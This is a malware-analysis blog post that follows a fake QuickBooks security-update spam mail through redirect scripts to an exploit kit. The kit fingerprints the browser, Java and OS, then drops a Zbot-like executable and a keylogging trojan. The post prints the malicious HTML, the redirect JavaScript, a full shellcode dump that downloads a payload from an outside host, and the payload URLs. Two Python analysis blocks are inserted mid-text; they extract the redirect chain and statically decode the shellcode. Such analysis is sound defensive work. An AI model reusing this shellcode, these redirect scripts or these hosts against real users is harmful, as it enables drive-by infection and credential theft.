Saturday, September 1, 2012

What can Exploit Kit do & drop? Full story of spam to malwares

I followed the infection steps of ONE spam mail, which led to a sophisticated exploit kit that dropped MANY malware samples. During the infection it automatically fingerprinted the victim's browser and PC beforehand, to pick the best mess to drop and infect you with.
The collection of dropped malware is in the picture below:

↑ As you can see, all of them carry today's date; they are fresh. Don't worry, the samples are out there, grab them all.
This threat is so nasty that I think I need to blog it. Below is the report.

I believe some of you have received or are seeing mail like this:

Date: Tue, 28 Aug 2012 11:04:30 -0400
From: "Intuit Payroll Services"
Subject: QuickBooks Security Update

You will not be able to access your Intuit QuickBooks without updated Intuit Security Tool (IST™) after 31th of August, 2012. You can update Intuit Security Tool here. After a successful download please run the setup for an automatic installation, then login to Intuit Quickbooks online to check that it is working properly.

This email was sent from an auto-notification system that can't accept incoming email. Please don't reply to this message. You have received this business communication as part of our efforts to fulfill your request or service your account. You may receive this and other business communications from us even if you have opted out of marketing messages. Terms, conditions, pricing, features, and service options are subject to change. View our complete Terms of Service.

If you click the terms and conditions link you will be taken to the URL below:
hxxp://babyu.onedaynet.co.kr/JHF0X3B/index.html
After accessing the URL you get the malicious index.html shown below:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="hXXp://66.242.140.34/LA5S92vH/js.js"></script>
<script type="text/javascript" src="hXXp://freerobinfly.com/sS5N3rtK/js.js"></script>
<script type="text/javascript" src=" hXXp://ftp.santoscortereal.com.br/wBWnt3vJ/js.js"></script>
</html>

↑ This is a not-good index.html; let's check it in VirusTotal:
MD5: 5d323254ee15f460a6bd6f7262cd3c42
File size: 327 バイト ( 327 bytes )
File name: output.2145601.txt
File type: HTML
Tags: html
Detection ratio: 18 / 42
Analysis date: 2012-08-31 12:47:34 UTC
URL: [CLICK]

If you trace the three URLs written in that HTML, they all lead you to the same JavaScript file. I traced them like this:

--00:27:31--  hXXp://66.242.140.34/LA5S92vH/js.js
           => `js.js'
Connecting to 66.242.140.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 78 [application/x-javascript]

100%[====================================>] 78            --.--K/s

00:27:32 (2.72 MB/s) - `js.js' saved [78/78]

--00:27:40--  hXXp://freerobinfly.com/sS5N3rtK/js.js
           => `js.js.1'
Resolving freerobinfly.com... 74.208.242.135
Connecting to freerobinfly.com|74.208.242.135|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 78 [application/x-javascript]

100%[====================================>] 78            --.--K/s

00:27:41 (371.47 KB/s) - `js.js.1' saved [78/78]

--00:27:47--  hXXp://ftp.santoscortereal.com.br/wBWnt3vJ/js.js
           => `js.js.2'
Resolving ftp.santoscortereal.com.br... 200.98.197.17
Connecting to ftp.santoscortereal.com.br|200.98.197.17|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 78 [application/x-javascript]

100%[====================================>] 78            --.--K/s

00:27:48 (1.92 MB/s) - `js.js.2' saved [78/78]

Let's see what's inside this js.js:
document.location='hXXp://50.116.44.177/pxyk80ujzb03h.php?y=078eb263358008ea';

↑ Another redirection. OK. This is no good either; let's check in VirusTotal again:
MD5: e2525763bdf95e9a33001fd231ee109e
File size: 78 バイト ( 78 bytes )
File name: js.js
File type: Text
Detection ratio: 3 / 42
Analysis date: 2012-08-31 15:59:42 UTC ( 0 分 ago )
URL: [CLICK]

↑ OK, at least three antivirus products detect it. Let's grab it too and look inside it then ↓
--00:29:18--  http://50.116.44.177/pxyk80ujzb03h.php?y=078eb263358008ea
           => `pxyk80ujzb03h.php@y=078eb263358008ea'
Connecting to 50.116.44.177:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

    [ <=>                                  ] 69,236       115.00K/s

00:29:20 (114.70 KB/s) - `pxyk80ujzb03h.php@y=078eb263358008ea' saved [69236]

And the inside is obfuscated code like this (see the picture). ↑ This is definitely not good at all; let's check it in VirusTotal first ↓
MD5: 643e431692f6ce0eaf4bb4bdb1e0ed4a
File size: 67.6 KB ( 69236 bytes )
File name: pxyk80ujzb03h.php@y=078eb263358008ea
File type: HTML
Detection ratio: 2 / 42
Analysis date: 2012-08-31 16:18:34 UTC ( 0 分 ago )
URL: [CLICK]

Oh, looks like I am the first to upload this sample. Well, at least NOW 2 antivirus products detect it. If you deobfuscate it correctly you will get the result below; one part is this code:

document.write('<center>Waiting for redirect...</center>');
function end_redirect(){
    window.location.href = 'hxxp://davidkellett.co.uk/updateflashplayer.exe';
}

And the other is PluginDetect, a plugin detection library in JavaScript:
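As an added example (not code from the post or from the kit), the hand-offs shown so far, from index.html through js.js to the deobfuscated redirect, pulled out as one defanged chain for an IOC note. The three stage strings are constructed from the samples printed above; the stage labels are my own.

```python
import re

# Constructed samples copied from the three stages shown in this post
# (index.html, js.js, and the deobfuscated redirect). URLs stay defanged
# (hxxp) exactly as the post prints them.
STAGE1_HTML = """<html> <h1>WAIT PLEASE</h1> <h3>Loading...</h3>
<script type="text/javascript" src="hXXp://66.242.140.34/LA5S92vH/js.js"></script>
<script type="text/javascript" src="hXXp://freerobinfly.com/sS5N3rtK/js.js"></script>
<script type="text/javascript" src=" hXXp://ftp.santoscortereal.com.br/wBWnt3vJ/js.js"></script>
</html>"""
STAGE2_JS = "document.location='hXXp://50.116.44.177/pxyk80ujzb03h.php?y=078eb263358008ea';"
STAGE3_JS = ("document.write('<center>Waiting for redirect...</center>');"
             " function end_redirect(){ window.location.href ="
             " 'hxxp://davidkellett.co.uk/updateflashplayer.exe'; }")

# The three hand-off mechanisms seen in the chain: an external <script src>,
# a document.location assignment, and a window.location.href assignment.
PATTERNS = [
    ("script-src", re.compile(r'<script[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)),
    ("document.location", re.compile(r'document\.location\s*=\s*["\']([^"\']+)["\']', re.I)),
    ("window.location.href", re.compile(r'window\.location\.href\s*=\s*["\']([^"\']+)["\']', re.I)),
]

def defang(url):
    """Defang for an IOC note: hxxp(s) scheme, dots in the host bracketed."""
    scheme, _, rest = url.strip().partition("://")
    host, sep, path = rest.partition("/")
    scheme = "hxxps" if scheme.lower().endswith("s") else "hxxp"
    return scheme + "://" + host.replace(".", "[.]") + sep + path

def extract_hops(stage, content):
    """Every (stage, mechanism, defanged URL) hand-off found in one stage."""
    return [(stage, mech, defang(u)) for mech, pat in PATTERNS for u in pat.findall(content)]

def chain(stages):
    """Walk the stages in the order they were fetched and collect the whole chain."""
    return [hop for stage, content in stages for hop in extract_hops(stage, content)]

if __name__ == "__main__":
    for hop in chain([("index.html", STAGE1_HTML), ("js.js", STAGE2_JS),
                      ("pxyk80ujzb03h.php", STAGE3_JS)]):
        print("%-18s %-22s %s" % hop)
```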
var PluginDetect = {
    version : "0.7.8",
    name : "PluginDetect",
    handler : function (c, b, a){
        return function (){ c(b, a) <etc etc> ...

It detects your OS:
c.OS = 100;
if (b){
    var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, "", 100];
    for (f = d.length - 2; f >= 0; f = f - 2){
        if (d[f] && new RegExp(d[f], "i").test(b)){
            c.OS = d[f + 1];
            break

It senses your browser user agent to choose the right drop:
var c = this, a = navigator, e = "/", f,
    i = a.userAgent || "", g = a.vendor || "", b = a.platform || "", h = a.product || "";
c.initObj(c, ["$", c]);
for (f in c.Plugins){
    if (c.Plugins[f]){
        c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
    }

Sensing the elements it can use to install its mess into your browser:
c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName("body")[0] || document.body || null);
c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : null;
c.ActiveXEnabled = false;
if (c.isIE){
    var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", "Scripting.Dictionary", "wmplayer.ocx"];
    for (f = 0; f < j.length; f ++ ){
        if (c.getAXO(j[f])){
            c.ActiveXEnabled = true;
            break

And checking which browser you have:
c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 : "0.9") : null;
c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
c.isSafari = ((/Apple/i).test(g) || (!g && !c.isChrome)) && (/Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(RegExp.$1) : null;
c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ?

Very interesting: this code is considering using Java against you:
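To show what the OS and browser checks above actually key on, here is an added re-implementation in Python (my own code, not the kit's and not the post's) of the OS table and the user-agent regexes from the excerpts. It keeps the kit's reverse walk over the table, which is why "Win.*CE" beats the generic "Win"; the IE detection via @cc_on cannot be reproduced outside IE, so only the MSIE version regex is used, and the sample user agents in the test are constructed.

```python
import re

# OS table from the PluginDetect excerpt: regex followed by the code the
# kit assigns. It is walked from the END, so the more specific entries
# ("Win.*CE", "Win.*Mobile") win over the generic "Win" that also matches.
OS_TABLE = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1,
            "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2,
            "Pocket\\s*PC", 22.3, "", 100]

def detect_os(platform):
    """Reproduce c.OS: default 100 (unknown); last matching entry wins."""
    code = 100
    for f in range(len(OS_TABLE) - 2, -1, -2):
        if OS_TABLE[f] and re.search(OS_TABLE[f], platform, re.I):
            code = OS_TABLE[f + 1]
            break
    return code

# (name, presence regex, version regex) lifted from the browser checks in
# the excerpt, tried in the kit's order. The @cc_on trick used for isIE is
# IE-only, so IE is recognised here by the MSIE version regex alone.
BROWSERS = [
    ("ie",     r"MSIE\s*(\d+\.?\d*)",       r"MSIE\s*(\d+\.?\d*)"),
    ("chrome", r"Chrome\s*/\s*(\d[\d.]*)",  r"Chrome\s*/\s*(\d[\d.]*)"),
    ("opera",  r"Opera\s*/?\s*(\d+\.?\d*)", r"Version\s*/\s*(\d+\.?\d*)"),
    ("gecko",  r"Gecko\s*/\s*\d",           r"rv\s*:\s*([.,\d]+)"),
    ("safari", r"Safari\s*/\s*(\d[\d.]*)",  r"Version\s*/\s*(\d[\d.]*)"),
]

def detect_browser(ua):
    """Return (name, version) for the first browser whose presence regex fires."""
    for name, present, ver in BROWSERS:
        if re.search(present, ua, re.I):
            m = re.search(ver, ua, re.I)
            return name, (m.group(1) if m else None)
    return "unknown", None

def fingerprint(ua, platform):
    """The tuple the kit builds before choosing what to drop."""
    browser, version = detect_browser(ua)
    return {"os": detect_os(platform), "browser": browser, "version": version}
```

Any server-side rule that keys on the same fields (for example, serving the Java path only to a Windows IE fingerprint) can be reproduced in a sandbox by varying these inputs.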
DTK : {
    $ : 1, hasRun : 0, status : null, VERSIONS : [], version : "", HTML : null, Plugin2Status : null,
    classID : ["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA", "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"],
    mimeType : ["application/java-deployment-toolkit", "application/npruntime-scriptable-plugin;DeploymentToolkit"],
    disabled : function (){
    : : :
    var m, s = "1,4,2,0", g = "JavaPlugin." + a[0] + "" + a[1] + "" + a[2] + "" + (a[3] > 0 ? ("_" + (a[3] < 10 ? "0" : "") + a[3]) : "");
    for (h = 0; h < f.JavaVersions.length; h ++ ){
        d = f.JavaVersions[h];
        n = "JavaPlugin." + d[0] + "" + d[1];
        b = d[0] + "." + d[1] + ".";
        for (l = d[2]; l >= 0; l -- ){
            r = "JavaWebStart.isInstalled." + b + l + ".0";
            if (e.compareNums(d[0] + "," + d[1] + "," + l + ",0", j) >= 0 && !e.getAXO

Well, it is sophisticated, isn't it? The full deobfuscated code is here ====>>> [CLICK] OK, let's go further. The deobfuscated code above also carries the shellcode below:
41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 e9 57 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3 24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3 2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b 5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7 d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28 28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c 29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c 0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40 d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28 5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21 28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28 7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e 2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2 26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07 58 40 5c 5c 58 12 07 07 1d 18 06 19 19 1e 06 1c 1c 06 19 1f 1f 07 58 06 58 40 58 17 4e 15 18 19 1c 18 18 0e 4d 15 19 28 28 00
This shellcode downloads a file from:
hxxp://50.116.44.177/p.php?f=01400&e=1
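As an added example (my own analysis code, not from the post), a static decoder for the shellcode above: it reads the XOR key and byte count out of the decoder loop (sub cx,imm16 / xor byte [eax],imm8 / inc eax / loop), treats the bytes after the backwards call as the encoded blob, and recovers the download URL without running anything. The embedded sample is a constructed subset of the dump: the 32-byte stub plus the tail that holds the URL, with the middle bytes omitted.

```python
import re

# Bytes copied from the dump above: the decoder stub, then the tail of the
# encoded blob. The middle of the blob is omitted here, so this is an
# abbreviated, constructed sample of the real dump.
STUB_HEX = ("41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 e9 57 fe "
            "80 30 28 40 e2 fa eb 05 e8 eb ff ff ff")
TAIL_HEX = ("40 5c 5c 58 12 07 07 1d 18 06 19 19 1e 06 1c 1c 06 19 1f 1f "
            "07 58 06 58 40 58 17 4e 15 18 19 1c 18 18 0e 4d 15 19 28 28 00")
SAMPLE = bytes.fromhex(STUB_HEX + " " + TAIL_HEX)

def parse_decoder(sc):
    """Locate the decoder loop and return (key, length, start of encoded data).
       66 81 e9 lo hi : sub cx, imm16  -> counter = -imm16 = blob length
       80 30 KEY      : xor byte [eax], KEY
       40 / e2 fa     : inc eax / loop
       e8 eb ff ff ff : call back to the pop eax; the blob follows the call."""
    m = re.search(rb"\x66\x81\xe9(..)\x80\x30(.)\x40\xe2\xfa", sc, re.S)
    if not m:
        raise ValueError("decoder stub pattern not found")
    imm16 = int.from_bytes(m.group(1), "little")
    length = (-imm16) & 0xFFFF
    key = m.group(2)[0]
    start = sc.index(b"\xe8\xeb\xff\xff\xff", m.end()) + 5
    return key, length, start

def decode(sc):
    """XOR the encoded blob with the single-byte key from the stub."""
    key, length, start = parse_decoder(sc)
    return bytes(b ^ key for b in sc[start:start + length])

def defang(url):
    scheme, _, rest = url.partition("://")
    host, sep, path = rest.partition("/")
    return "hxxp://" + host.replace(".", "[.]") + sep + path

def extract_urls(sc):
    """Decode, then return every URL string in the blob, defanged for an IOC note."""
    return [defang(u.decode()) for u in re.findall(rb"https?://[\x21-\x7e]+", decode(sc))]

if __name__ == "__main__":
    key, length, _ = parse_decoder(SAMPLE)
    print("key=0x%02x length=%d" % (key, length), extract_urls(SAMPLE))
```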
So we have two new download URLs that we can assume are payloads; let's check. The first URL is:

--00:34:48--  hxxp://davidkellett.co.uk/updateflashplayer.exe
           => `updateflashplayer.exe'
Resolving davidkellett.co.uk... 209.235.144.9
Connecting to davidkellett.co.uk|209.235.144.9|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 371,112 (362K) [application/x-msdownload]

100%[====================================>] 371,112       72.82K/s    ETA 00:00

00:34:55 (52.38 KB/s) - `updateflashplayer.exe' saved [371112/371112]

In VirusTotal the score is 11/42:
MD5: 4c22e00d38a44b810f6103ec6837b137
File size: 362.4 KB ( 371112 bytes )
File name: updateflashplayer.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 11 / 42
Analysis date: 2012-08-31 15:29:23 UTC ( 7 分 ago )
URL: [CLICK]

↑ It looks like Zbot. I am not an expert with naming stuff; anyway, I wrote the malware details on the VirusTotal page. The other drop goes to:

--00:36:20--  http://50.116.44.177/p.php?f=01400
           => `p.php@f=01400'
Connecting to 50.116.44.177:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 177,576 (173K) [application/x-msdownload]

100%[===================================> ] 177,576      147.57K/s

00:36:22 (147.13 KB/s) - `p.php@f=01400' saved [177576/177576]

This is also bad stuff; in VirusTotal only 1 (one) vendor detected it.
MD5: 096a79434392461517907c6f62b27cd1
File size: 173.4 KB ( 177576 bytes )
File name: sample
File type: Win32 EXE
Tags: peexe
Detection ratio: 1 / 42
Analysis date: 2012-08-31 15:37:57 UTC ( 1 時間, 23 分 ago )
URL: [URL]

↑ It is a Trojan: it runs as a daemon/process, reads the keyboard and screen, and worst of all it fakes a Microsoft binary with yesterday's compilation date.

2 comments:

  1. Nice "FAST" work! And it's not even 9/1 here yet, so this is still in my future :)

  2. Thanks RazorEQX, I wrote as fast as I could.. Analyzing and just wrote it in the blog.. sorry for the mistypes.. no time to correct the typos...
    Please add a comment if you have a thought on what I cannot detect yet, like what kind of Exploit Kit it is.
